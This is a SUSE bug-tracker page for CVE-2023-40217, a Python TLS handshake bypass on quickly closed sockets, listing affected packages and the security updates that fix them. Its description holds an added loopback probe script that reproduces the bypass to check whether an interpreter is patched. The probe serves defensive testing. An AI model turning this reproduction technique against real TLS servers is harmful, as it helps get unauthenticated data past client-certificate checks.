Bug 1214692 (CVE-2023-40217)

Summary: VUL-0: CVE-2023-40217: python,python3,python39,python36,python310,python311: Bypass TLS handshake on closed sockets
Product: [Novell Products] SUSE Security Incidents
Reporter: Cathy Hu <cathy.hu>
Component: Incidents
Assignee: Security Team bot <security-team>
Status: IN_PROGRESS ---
QA Contact: Security Team bot <security-team>
Severity: Major
Priority: P3 - Medium
CC: cxiong, daniel.garcia, mcepl, security-team
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/376327/
Whiteboard: CVSSv3.1:SUSE:CVE-2023-40217:7.4:(AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Description Cathy Hu 2023-08-28 12:00:14 UTC
CVE-2023-40217

An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x
before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers (such as
HTTP servers) that use TLS client authentication. If a TLS server-side socket is
created, receives data into the socket buffer, and then is closed quickly, there
is a brief window where the SSLSocket instance will detect the socket as "not
connected" and won't initiate a handshake, but buffered data will still be
readable from the socket buffer. This data will not be authenticated if the
server-side TLS peer is expecting client certificate authentication, and is
indistinguishable from valid TLS stream data. Data is limited in size to the
amount that will fit in the buffer. (The TLS connection cannot directly be used
for data exfiltration because the vulnerable code path requires that the
connection be closed on initialization of the SSLSocket.)

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-40217
https://www.cve.org/CVERecord?id=CVE-2023-40217
https://mail.python.org/archives/list/security-announce@python.org/thread/PEPLII27KYHLF4AK3ZQGKYNCRERG4YXY/
https://www.python.org/dev/security/
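The bypass described above, as an added example that is not part of this bug, the CVE record or CPython's own code or tests: a self-contained probe that reproduces the condition on the running interpreter and reports whether ssl still hands pre-handshake bytes to the caller. It assumes Linux TCP semantics (an incoming RST moves the accepted socket to TCP_CLOSE, so getpeername() fails with ENOTCONN while the bytes already queued remain readable) and Python 3.6 or newer; the payload, the loopback setup and the names probe_pre_handshake_leak, version_claims_fixed and _wait_until_not_connected are this example's own. No certificate is loaded because neither outcome reaches the handshake: the affected code path skips it, and the fixed one raises before the SSL object is created.

```python
"""Behavioural probe for CVE-2023-40217 on the running interpreter (Linux, Python 3.6+).

Added example, not code from the bug report, the CVE record or CPython. It
reproduces the condition the CVE describes: a server-side socket that already
holds bytes in its receive buffer but that the kernel reports as not connected
by the time ssl wraps it.
"""
import errno
import socket
import ssl
import struct
import time

# Constructed plaintext; it is never part of a TLS record.
PRE_HANDSHAKE_DATA = b"GET /admin HTTP/1.0\r\n\r\n"

# Upstream fix versions from the CVE text: earlier releases of these minors are affected.
FIXED_IN = {(3, 8): (3, 8, 18), (3, 9): (3, 9, 18), (3, 10): (3, 10, 13), (3, 11): (3, 11, 5)}


def version_claims_fixed(version):
    """Map a (major, minor, micro) tuple onto the CVE's upstream affected ranges.

    Only a hint: vendor builds (the python3 3.6.15 and python 2.7.18 updates in
    this bug) carry the fix without changing the version, so trust the probe.
    """
    key = (version[0], version[1])
    if key in FIXED_IN:
        return tuple(version[:3]) >= FIXED_IN[key]
    return key > (3, 11)  # 3.12 and later shipped fixed; 3.7 and older never got a fix


def _wait_until_not_connected(conn, timeout=2.0):
    """Poll until getpeername() fails with ENOTCONN, the state the affected path keys on.

    Assumption about Linux: an incoming RST moves the socket to TCP_CLOSE, which
    makes getpeername() fail while bytes already queued are still readable.
    """
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            conn.getpeername()
        except OSError as exc:
            if exc.errno == errno.ENOTCONN:
                return True
            raise
        time.sleep(0.01)
    return False


def probe_pre_handshake_leak(payload=PRE_HANDSHAKE_DATA):
    """Return "patched", "vulnerable" or "inconclusive" for the running interpreter."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        listener.bind(("127.0.0.1", 0))  # ephemeral port on loopback
        listener.listen(1)
        listener.settimeout(2.0)
        client.connect(listener.getsockname())
        conn, _ = listener.accept()
        conn.settimeout(2.0)

        # The "client" sends plaintext and then aborts with an RST (SO_LINGER with a
        # zero timeout) before the server side ever calls wrap_socket().
        client.sendall(payload)
        client.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))
        client.close()
        if not _wait_until_not_connected(conn):
            conn.close()
            return "inconclusive"

        # Server context that demands a client certificate, as in the CVE's scenario.
        # No certificate is loaded: neither outcome below reaches the handshake.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ctx.verify_mode = ssl.CERT_REQUIRED
        try:
            tls = ctx.wrap_socket(conn, server_side=True)
        except ssl.SSLError:
            # Fixed CPython raises "Closed before TLS handshake with data in recv buffer."
            return "patched"

        # Affected CPython returns an SSLSocket with no SSL object behind it; recv()
        # then falls through to the plain socket and hands back the buffered bytes,
        # never authenticated by any client certificate.
        with tls:
            leaked = tls.recv(len(payload))
        return "vulnerable" if leaked == payload else "inconclusive"
    finally:
        client.close()
        listener.close()


if __name__ == "__main__":
    import sys
    hint = "fixed" if version_claims_fixed(sys.version_info) else "affected"
    print(sys.version.split()[0], probe_pre_handshake_leak(), "(version hint: %s)" % hint)
```

Run it with the interpreter you want to check. "patched" means wrap_socket() refused the socket with an SSLError; "vulnerable" means the plaintext came back through recv() on an SSLSocket whose context required a client certificate, which is the unauthenticated read the CVE describes. Prefer that result over version_claims_fixed(): the python3 3.6.15, python3 3.4.10 and python 2.7.18 updates later in this bug fix the issue without bumping the upstream version string.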
Comment 1 Cathy Hu 2023-08-28 12:01:38 UTC
All codestreams affected:
- SUSE:SLE-12-SP1:Update/python                               2.7.18
- SUSE:SLE-12-SP1:Update/python-base                          2.7.18
- SUSE:SLE-12-SP4:Update/python                               2.7.18
- SUSE:SLE-12-SP4:Update/python-base                          2.7.18
- SUSE:SLE-15:Update/python                                   2.7.18
- SUSE:SLE-15:Update/python-base                              2.7.18
- openSUSE:Factory/python                                     2.7.18

- SUSE:SLE-12:Update/python3                                  3.4.10

- SUSE:SLE-12-SP3:Update:Products:Teradata:Update/python36    3.6.15
- SUSE:SLE-12-SP5:Update/python36                             3.6.15

- SUSE:SLE-15-SP3:Update/python39                             3.9.17
- openSUSE:Factory/python39                                   3.9.17

- SUSE:ALP:Source:Standard:1.0/python310                      3.10.10
- SUSE:SLE-15-SP4:Update/python310                            3.10.12
- openSUSE:Factory/python310                                  3.10.12

- SUSE:ALP:Source:Standard:1.0/python311                      3.11.2
- SUSE:SLE-15-SP4:Update/python311                            3.11.4
- openSUSE:Factory/python311                                  3.11.4

Also affected, but unsupported:
- SUSE:SLE-11-SP1:Update/python                               2.6.9
- SUSE:SLE-11-SP1:Update/python-base                          2.6.9
Comment 2 Daniel Garcia 2023-09-05 11:16:37 UTC
Fixed for openSUSE:Factory/python310 in factory in this request:
https://build.opensuse.org/request/show/1108911
Comment 4 OBSbugzilla Bot 2023-09-06 07:35:02 UTC
This is an autogenerated message for OBS integration:
This bug (1214692) was mentioned in
https://build.opensuse.org/request/show/1109196 Factory / python38
https://build.opensuse.org/request/show/1109203 Factory / python39
Comment 5 OBSbugzilla Bot 2023-09-06 09:45:03 UTC
This is an autogenerated message for OBS integration:
This bug (1214692) was mentioned in
https://build.opensuse.org/request/show/1109225 Factory / python311
Comment 8 Matej Cepl 2023-09-09 15:48:16 UTC
Isn’t this problem also for

- SUSE:SLE-15:Update/python3                                          3.6.15

???
Comment 9 Matej Cepl 2023-09-09 15:51:25 UTC
And also

- SUSE:SLE-15-SP3:Update/python3                                          3.6.15
Comment 10 Cathy Hu 2023-09-11 08:39:34 UTC
Yes, Matej is right.

Also affected:
- SUSE:SLE-15:Update/python3                                  3.6.15
- SUSE:SLE-15-SP3:Update/python3                              3.6.15
Comment 13 OBSbugzilla Bot 2023-09-13 12:55:04 UTC
This is an autogenerated message for OBS integration:
This bug (1214692) was mentioned in
https://build.opensuse.org/request/show/1110909 Factory / python
Comment 15 Daniel Garcia 2023-09-14 05:34:35 UTC
There's a request created for each affected codestream with a fix for this issue.
Comment 20 Maintenance Automation 2023-09-20 16:30:01 UTC
SUSE-SU-2023:3708-1: An update that solves one vulnerability and has two security fixes can now be installed.

Category: security (important)
Bug References: 1211765, 1213463, 1214692
CVE References: CVE-2023-40217
Sources used:
openSUSE Leap 15.4 (src): python39-documentation-3.9.18-150300.4.33.1, python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
openSUSE Leap 15.5 (src): python39-documentation-3.9.18-150300.4.33.1, python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP3 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Manager Proxy 4.2 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Manager Retail Branch Server 4.2 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Manager Server 4.2 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Enterprise Storage 7.1 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 21 Maintenance Automation 2023-09-22 12:30:05 UTC
SUSE-SU-2023:3731-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
SUSE Linux Enterprise Software Development Kit 12 SP5 (src): python36-core-3.6.15-49.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): python36-core-3.6.15-49.1, python36-3.6.15-49.1
SUSE Linux Enterprise Server 12 SP5 (src): python36-core-3.6.15-49.1, python36-3.6.15-49.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): python36-core-3.6.15-49.1, python36-3.6.15-49.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 22 Maintenance Automation 2023-09-22 12:30:07 UTC
SUSE-SU-2023:3730-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): python-2.7.18-33.23.1, python-doc-2.7.18-33.23.1, python-base-2.7.18-33.23.1
SUSE Linux Enterprise Server 12 SP5 (src): python-2.7.18-33.23.1, python-doc-2.7.18-33.23.1, python-base-2.7.18-33.23.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): python-2.7.18-33.23.1, python-doc-2.7.18-33.23.1, python-base-2.7.18-33.23.1
SUSE Linux Enterprise Workstation Extension 12 12-SP5 (src): python-base-2.7.18-33.23.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 23 Maintenance Automation 2023-09-27 16:30:20 UTC
SUSE-SU-2023:3804-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
SUSE Linux Enterprise High Performance Computing 15 SP1 LTSS 15-SP1 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Server 15 SP1 LTSS 15-SP1 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Server for SAP Applications 15 SP1 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE CaaS Platform 4.0 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Micro 5.1 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 24 Maintenance Automation 2023-09-27 20:31:00 UTC
SUSE-SU-2023:3828-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
openSUSE Leap 15.4 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1, python3-documentation-3.6.15-150300.10.51.1
openSUSE Leap 15.5 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1, python3-documentation-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro for Rancher 5.3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro 5.3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro for Rancher 5.4 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro 5.4 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
Basesystem Module 15-SP4 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
Basesystem Module 15-SP5 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
Development Tools Module 15-SP4 (src): python3-core-3.6.15-150300.10.51.1
Development Tools Module 15-SP5 (src): python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Manager Proxy 4.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Manager Retail Branch Server 4.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Manager Server 4.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Enterprise Storage 7.1 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro 5.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro for Rancher 5.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 25 Maintenance Automation 2023-09-27 20:31:20 UTC
SUSE-SU-2023:3824-1: An update that solves one vulnerability and has one security fix can now be installed.

Category: security (important)
Bug References: 1213463, 1214692
CVE References: CVE-2023-40217
Sources used:
openSUSE Leap 15.4 (src): python310-core-3.10.13-150400.4.33.1, python310-3.10.13-150400.4.33.1, python310-documentation-3.10.13-150400.4.33.1
openSUSE Leap 15.5 (src): python310-core-3.10.13-150400.4.33.1, python310-3.10.13-150400.4.33.1, python310-documentation-3.10.13-150400.4.33.1
Python 3 Module 15-SP4 (src): python310-core-3.10.13-150400.4.33.1, python310-3.10.13-150400.4.33.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 28 Maintenance Automation 2023-10-02 08:30:19 UTC
SUSE-SU-2023:3933-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
openSUSE Leap 15.4 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1, python-doc-2.7.18-150000.54.1
openSUSE Leap 15.5 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1, python-doc-2.7.18-150000.54.1
SUSE Package Hub 15 15-SP4 (src): python-base-2.7.18-150000.54.1
SUSE Package Hub 15 15-SP5 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise High Performance Computing 15 SP1 LTSS 15-SP1 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP3 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server 15 SP1 LTSS 15-SP1 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server for SAP Applications 15 SP1 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Manager Proxy 4.2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Manager Retail Branch Server 4.2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Manager Server 4.2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Enterprise Storage 7.1 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE CaaS Platform 4.0 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 29 Maintenance Automation 2023-10-03 12:30:01 UTC
SUSE-SU-2023:3939-1: An update that solves two vulnerabilities can now be installed.

Category: security (important)
Bug References: 1214692, 1214693
CVE References: CVE-2023-40217, CVE-2023-41105
Sources used:
Web and Scripting Module 12 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1
SUSE Linux Enterprise Software Development Kit 12 SP5 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1
SUSE Linux Enterprise Server 12 SP5 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 30 Maintenance Automation 2023-10-03 20:30:50 UTC
SUSE-SU-2023:3943-1: An update that solves two vulnerabilities can now be installed.

Category: security (important)
Bug References: 1214692, 1214693
CVE References: CVE-2023-40217, CVE-2023-41105
Sources used:
openSUSE Leap 15.4 (src): python311-documentation-3.11.5-150400.9.20.2, python311-3.11.5-150400.9.20.1, python311-core-3.11.5-150400.9.20.2
openSUSE Leap 15.5 (src): python311-documentation-3.11.5-150400.9.20.2, python311-3.11.5-150400.9.20.1, python311-core-3.11.5-150400.9.20.2
Python 3 Module 15-SP4 (src): python311-documentation-3.11.5-150400.9.20.2, python311-3.11.5-150400.9.20.1, python311-core-3.11.5-150400.9.20.2
Python 3 Module 15-SP5 (src): python311-documentation-3.11.5-150400.9.20.2, python311-3.11.5-150400.9.20.1, python311-core-3.11.5-150400.9.20.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 33 Maintenance Automation 2023-10-19 12:30:06 UTC
SUSE-SU-2023:3828-2: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
SUSE Linux Enterprise Micro 5.5 (src): python3-core-3.6.15-150300.10.51.1, python3-3.6.15-150300.10.51.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 39 Maintenance Automation 2024-03-06 20:30:02 UTC
SUSE-SU-2024:0785-1: An update that solves two vulnerabilities can now be installed.

Category: security (important)
Bug References: 1214692, 1219666
CVE References: CVE-2023-40217, CVE-2023-6597
Sources used:
Web and Scripting Module 12 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1
SUSE Linux Enterprise Software Development Kit 12 SP5 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1
SUSE Linux Enterprise Server 12 SP5 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 40 Maintenance Automation 2024-03-06 20:30:05 UTC
SUSE-SU-2024:0784-1: An update that solves four vulnerabilities, contains two features and has two security fixes can now be installed.

Category: security (important)
Bug References: 1196025, 1210638, 1212015, 1214692, 1215454, 1219666
CVE References: CVE-2022-25236, CVE-2023-27043, CVE-2023-40217, CVE-2023-6597
Jira References: PED-7886, SLE-21253
Sources used:
openSUSE Leap 15.3 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1, python39-documentation-3.9.18-150300.4.38.1
openSUSE Leap 15.5 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1, python39-documentation-3.9.18-150300.4.38.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1
SUSE Enterprise Storage 7.1 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.